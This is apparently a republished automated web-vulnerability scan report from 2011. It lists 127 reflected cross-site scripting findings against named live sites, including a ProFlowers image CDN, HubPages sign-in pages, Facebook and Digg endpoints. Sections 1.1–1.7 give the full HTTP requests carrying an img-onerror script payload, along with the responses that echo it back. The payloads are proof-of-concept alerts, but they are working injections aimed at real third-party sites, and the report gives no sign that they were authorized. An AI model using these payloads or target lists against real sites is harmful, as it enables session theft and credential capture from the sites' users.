Ad CDN, XSS, Cross Site Scripting, CWE-79, Capec-86

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by XSS.CX Research Blog at Fri Feb 11 15:28:03 CST 2011.

The DORK Report

Loading

1. Cross-site scripting (reflected)

1.1. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ACC_spatrio_test [REST URL parameter 9]

1.2. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/AllinoneVDay_rbye11_4giftsnipe_PF [REST URL parameter 9]

1.3. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CAR24vday_gv10_PF [REST URL parameter 9]

1.4. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CHC_SCHC1005_RkmVdayHeartv2_VDY_FHB_11_PF [REST URL parameter 9]

1.5. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CONR100_BRR10112_VDAY11_PF [REST URL parameter 9]

1.6. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CONT315_BRR10006_VDAY11_PF [REST URL parameter 9]

1.7. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ContempoVase_tn [REST URL parameter 9]

1.8. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR10106_6Swizzle_VDY_11_PF [REST URL parameter 9]

1.9. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/Damask_AC [REST URL parameter 9]

1.10. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/GingerVase_tn [REST URL parameter 9]

1.11. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYassrtperu11_PF [REST URL parameter 9]

1.12. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQ15orchpurp10_PF [REST URL parameter 9]

1.13. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQallthefrills_dmsk11_PF [REST URL parameter 9]

1.14. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxhugskiss_rbyg10_PF [REST URL parameter 9]

1.15. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQgrowerschoice11_VdayPremiumFrills_PF [REST URL parameter 9]

1.16. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQhugskisses_rbye09_3_FREV_PF [REST URL parameter 9]

1.17. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQhugskisses_rbye11_PF [REST URL parameter 9]

1.18. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQithasitall_rbye10_PF [REST URL parameter 9]

1.19. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQjoyfulbouquet11_FC_PF [REST URL parameter 9]

1.20. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQjoyfulbouquet11_PF [REST URL parameter 9]

1.21. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQlittleallthefrills_gv11_PF [REST URL parameter 9]

1.22. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQmixedvdaycurly10_PF [REST URL parameter 9]

1.23. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQnewvdaybqt11_PF [REST URL parameter 9]

1.24. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQrosesalstro_dmsk11_PF [REST URL parameter 9]

1.25. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQshowersflowers_dmsk11_PF [REST URL parameter 9]

1.26. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQtruspec11_PF [REST URL parameter 9]

1.27. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQvdaytulipfreesia10_PF [REST URL parameter 9]

1.28. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORC3inrdphal_letitgrowmug10_PC1855_PF [REST URL parameter 9]

1.29. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inredrose_dkbsktrb09CAT_PF [REST URL parameter 9]

1.30. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6invdayros_redpot11_vdayheartpick_PC1844_PF [REST URL parameter 9]

1.31. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLThrtbmboo_redrocks10_PC1827_PF [REST URL parameter 9]

1.32. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12assrt50_rbye11_PF [REST URL parameter 9]

1.33. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12assrt_gv10_PF [REST URL parameter 9]

1.34. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12pink50_gv11_PF [REST URL parameter 9]

1.35. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12red40_rbye11_3_FV_PF [REST URL parameter 9]

1.36. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12red50_rbye11_FV_PF [REST URL parameter 9]

1.37. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12swtexp40nogyp_dmsk10_PF [REST URL parameter 9]

1.38. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12swtexp40nogyp_rbye10_FC_PF [REST URL parameter 9]

1.39. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12white50_09_l [REST URL parameter 9]

1.40. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS15assrtspray_rbye09_PF [REST URL parameter 9]

1.41. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS18red40_gv11_PF [REST URL parameter 9]

1.42. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24red40_rdtrmp09_PF [REST URL parameter 9]

1.43. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24red50_rbye11_FRV_PF [REST URL parameter 9]

1.44. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24red50_rbye11_PF [REST URL parameter 9]

1.45. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS36Red50_rbyg11_FRG_PF [REST URL parameter 9]

1.46. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS48assrtpet_gv09_PF [REST URL parameter 9]

1.47. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS_PAS_dynamite40_10_PF [REST URL parameter 9]

1.48. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/RubyVase_tn [REST URL parameter 9]

1.49. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_CXNLOVECUD11_GvnLoveCud_EDY_11_PF [REST URL parameter 9]

1.50. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL15swthrt_gv09_2_FC_PF [REST URL parameter 9]

1.51. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL20assrt_dmsk11_PF [REST URL parameter 9]

1.52. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL20hol_dmsk11_PF [REST URL parameter 9]

1.53. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL20hol_rbye09CAT_FREV_PF [REST URL parameter 9]

1.54. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL20hol_sgv09_control_FC_PF [REST URL parameter 9]

1.55. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL20hol_sgv09_test_PF [REST URL parameter 9]

1.56. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL30sweetheart_rdtrmp09_2_PF [REST URL parameter 9]

1.57. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL30sweetheart_rdtrmp10_PF [REST URL parameter 9]

1.58. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/bearwithredbow09_SQ [REST URL parameter 9]

1.59. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/holidaychoc07_tn [REST URL parameter 9]

1.60. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]

1.61. http://api.facebook.com/restserver.php [method parameter]

1.62. http://api.facebook.com/restserver.php [urls parameter]

1.63. http://api.viglink.com/api/ping [key parameter]

1.64. http://b.scorecardresearch.com/beacon.js [c1 parameter]

1.65. http://b.scorecardresearch.com/beacon.js [c15 parameter]

1.66. http://b.scorecardresearch.com/beacon.js [c2 parameter]

1.67. http://b.scorecardresearch.com/beacon.js [c3 parameter]

1.68. http://b.scorecardresearch.com/beacon.js [c4 parameter]

1.69. http://b.scorecardresearch.com/beacon.js [c5 parameter]

1.70. http://b.scorecardresearch.com/beacon.js [c6 parameter]

1.71. http://copypasta.credibl.es/stylesheets/compiled/copypasta.css [REST URL parameter 2]

1.72. http://copypasta.credibl.es/stylesheets/compiled/copypasta.css [REST URL parameter 3]

1.73. http://digg.com/remote-submit [REST URL parameter 1]

1.74. http://digg.com/submit [REST URL parameter 1]

1.75. http://hubpages.com/ [name of an arbitrarily supplied request parameter]

1.76. http://hubpages.com/about/advertise [REST URL parameter 1]

1.77. http://hubpages.com/about/advertise [name of an arbitrarily supplied request parameter]

1.78. http://hubpages.com/hubs/hot/ [REST URL parameter 1]

1.79. http://hubpages.com/hubs/hot/ [name of an arbitrarily supplied request parameter]

1.80. http://hubpages.com/my/hubs/stats [REST URL parameter 1]

1.81. http://hubpages.com/my/hubs/stats [REST URL parameter 2]

1.82. http://hubpages.com/my/hubs/stats [REST URL parameter 3]

1.83. http://hubpages.com/signin/ [REST URL parameter 1]

1.84. http://hubpages.com/topics/ [REST URL parameter 1]

1.85. http://hubpages.com/topics/ [name of an arbitrarily supplied request parameter]

1.86. http://hubpages.com/tour/affiliate [REST URL parameter 1]

1.87. http://hubpages.com/tour/affiliate [REST URL parameter 2]

1.88. http://hubpages.com/tour/affiliate [name of an arbitrarily supplied request parameter]

1.89. http://hubpages.com/user/new/ [REST URL parameter 1]

1.90. http://hubpages.com/user/new/ [REST URL parameter 2]

1.91. http://hubpages.com/user/new/ [name of an arbitrarily supplied request parameter]

1.92. https://hubpages.com/signin/ [REST URL parameter 1]

1.93. https://hubpages.com/signin/ [REST URL parameter 1]

1.94. https://hubpages.com/signin/ [explain parameter]

1.95. https://hubpages.com/signin/ [explain parameter]

1.96. https://hubpages.com/signin/ [name of an arbitrarily supplied request parameter]

1.97. https://hubpages.com/signin/ [s parameter]

1.98. https://hubpages.com/signin/ [s parameter]

1.99. https://hubpages.com/signin/ [url parameter]

1.100. https://hubpages.com/signin/ [url parameter]

1.101. https://hubpages.com/signin/reset/ [REST URL parameter 1]

1.102. https://hubpages.com/signin/reset/ [REST URL parameter 1]

1.103. https://hubpages.com/signin/reset/ [REST URL parameter 2]

1.104. https://hubpages.com/signin/reset/ [REST URL parameter 2]

1.105. https://hubpages.com/signin/reset/ [name of an arbitrarily supplied request parameter]

1.106. http://img.mediaplex.com/content/0/10105/PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby.js [mpck parameter]

1.107. http://img.mediaplex.com/content/0/10105/PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby.js [mpvc parameter]

1.108. http://img.mediaplex.com/content/0/10105/PF_VDay11_300x250_DODStatus_VSpl_1Dznrr.html [mpck parameter]

1.109. http://img.mediaplex.com/content/0/10105/PF_VDay11_300x250_DODStatus_VSpl_1Dznrr.html [mpck parameter]

1.110. http://img.mediaplex.com/content/0/10105/PF_VDay11_300x250_DODStatus_VSpl_1Dznrr.html [mpvc parameter]

1.111. http://img.mediaplex.com/content/0/10105/PF_VDay11_300x250_DODStatus_VSpl_1Dznrr.html [mpvc parameter]

1.112. http://products.proflowers.com/flowers/18-Red-Roses-30050119 [ref parameter]

1.113. http://products.proflowers.com/flowers/18-Red-Roses-30050119 [trackingpgroup parameter]

1.114. http://products.proflowers.com/flowers/18-Red-Roses-30050119 [viewpos parameter]

1.115. http://products.proflowers.com/flowers/20-Sweetheart-Tulips-30007357 [Ref parameter]

1.116. http://products.proflowers.com/flowers/20-Sweetheart-Tulips-30007357 [trackingpgroup parameter]

1.117. http://products.proflowers.com/flowers/20-Sweetheart-Tulips-30007357 [viewpos parameter]

1.118. http://rover.ebay.com/idmap/0 [footer&cb parameter]

1.119. http://tags.bluekai.com/site/50 [phint parameter]

1.120. http://widgets.digg.com/buttons/count [url parameter]

1.121. http://www.floristexpress.net/ [refcode parameter]

1.122. http://www.pcworld.com/search.html [qt parameter]

1.123. http://www.pcworld.com/search.html [s parameter]

1.124. http://tags.bluekai.com/site/50 [Referer HTTP header]

1.125. http://products.proflowers.com/flowers/18-Red-Roses-30050119 [PFC_BrowserId cookie]

1.126. http://products.proflowers.com/flowers/20-Sweetheart-Tulips-30007357 [PFC_BrowserId cookie]

1.127. http://www.floristexpress.net/products/tulip_rainbow.htm [ref_code cookie]


1. Cross-site scripting (reflected)
There are 127 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

1.1. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ACC_spatrio_test [REST URL parameter 9]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ACC_spatrio_test

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload d8888<img%20src%3da%20onerror%3dalert(1)>c39920fb3bf was submitted in the REST URL parameter 9. This input was echoed as d8888<img src=a onerror=alert(1)>c39920fb3bf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ACC_spatrio_testd8888<img%20src%3da%20onerror%3dalert(1)>c39920fb3bf?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=50&hei=50 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/18-Red-Roses-30050119?viewpos=2&trackingpgroup=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 92
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:35:08 GMT
Connection: close

Unable to find /ProvideCommerce/ACC_spatrio_testd8888<img src=a onerror=alert(1)>c39920fb3bf
1.2. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/AllinoneVDay_rbye11_4giftsnipe_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/AllinoneVDay_rbye11_4giftsnipe_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload a0878<img%20src%3da%20onerror%3dalert(1)>06ac558497e was submitted in the REST URL parameter 9. This input was echoed as a0878<img src=a onerror=alert(1)>06ac558497e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/AllinoneVDay_rbye11_4giftsnipe_PFa0878<img%20src%3da%20onerror%3dalert(1)>06ac558497e?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 109
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:32:53 GMT
Connection: close

Unable to find /ProvideCommerce/AllinoneVDay_rbye11_4giftsnipe_PFa0878<img src=a onerror=alert(1)>06ac558497e
1.3. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CAR24vday_gv10_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CAR24vday_gv10_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload a5804<img%20src%3da%20onerror%3dalert(1)>df92fde2c2c was submitted in the REST URL parameter 9. This input was echoed as a5804<img src=a onerror=alert(1)>df92fde2c2c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CAR24vday_gv10_PFa5804<img%20src%3da%20onerror%3dalert(1)>df92fde2c2c?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 93
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:33:07 GMT
Connection: close

Unable to find /ProvideCommerce/CAR24vday_gv10_PFa5804<img src=a onerror=alert(1)>df92fde2c2c
1.4. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CHC_SCHC1005_RkmVdayHeartv2_VDY_FHB_11_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CHC_SCHC1005_RkmVdayHeartv2_VDY_FHB_11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload a503d<img%20src%3da%20onerror%3dalert(1)>f24d80e0805 was submitted in the REST URL parameter 9. This input was echoed as a503d<img src=a onerror=alert(1)>f24d80e0805 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CHC_SCHC1005_RkmVdayHeartv2_VDY_FHB_11_PFa503d<img%20src%3da%20onerror%3dalert(1)>f24d80e0805?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 117
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:32:55 GMT
Connection: close

Unable to find /ProvideCommerce/CHC_SCHC1005_RkmVdayHeartv2_VDY_FHB_11_PFa503d<img src=a onerror=alert(1)>f24d80e0805
1.5. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CONR100_BRR10112_VDAY11_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CONR100_BRR10112_VDAY11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 7a004<img%20src%3da%20onerror%3dalert(1)>e672d11766f was submitted in the REST URL parameter 9. This input was echoed as 7a004<img src=a onerror=alert(1)>e672d11766f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CONR100_BRR10112_VDAY11_PF7a004<img%20src%3da%20onerror%3dalert(1)>e672d11766f?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 102
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:49:35 GMT
Connection: close

Unable to find /ProvideCommerce/CONR100_BRR10112_VDAY11_PF7a004<img src=a onerror=alert(1)>e672d11766f
1.6. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CONT315_BRR10006_VDAY11_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CONT315_BRR10006_VDAY11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload aa1f8<img%20src%3da%20onerror%3dalert(1)>2379bea6731 was submitted in the REST URL parameter 9. This input was echoed as aa1f8<img src=a onerror=alert(1)>2379bea6731 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CONT315_BRR10006_VDAY11_PFaa1f8<img%20src%3da%20onerror%3dalert(1)>2379bea6731?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 102
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:33:06 GMT
Connection: close

Unable to find /ProvideCommerce/CONT315_BRR10006_VDAY11_PFaa1f8<img src=a onerror=alert(1)>2379bea6731
1.7. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ContempoVase_tn [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ContempoVase_tn

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 93aff<img%20src%3da%20onerror%3dalert(1)>e77f28a9ded was submitted in the REST URL parameter 9. This input was echoed as 93aff<img src=a onerror=alert(1)>e77f28a9ded in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ContempoVase_tn93aff<img%20src%3da%20onerror%3dalert(1)>e77f28a9ded?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&hei=73 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/18-Red-Roses-30050119?viewpos=2&trackingpgroup=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 91
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:35:06 GMT
Connection: close

Unable to find /ProvideCommerce/ContempoVase_tn93aff<img src=a onerror=alert(1)>e77f28a9ded
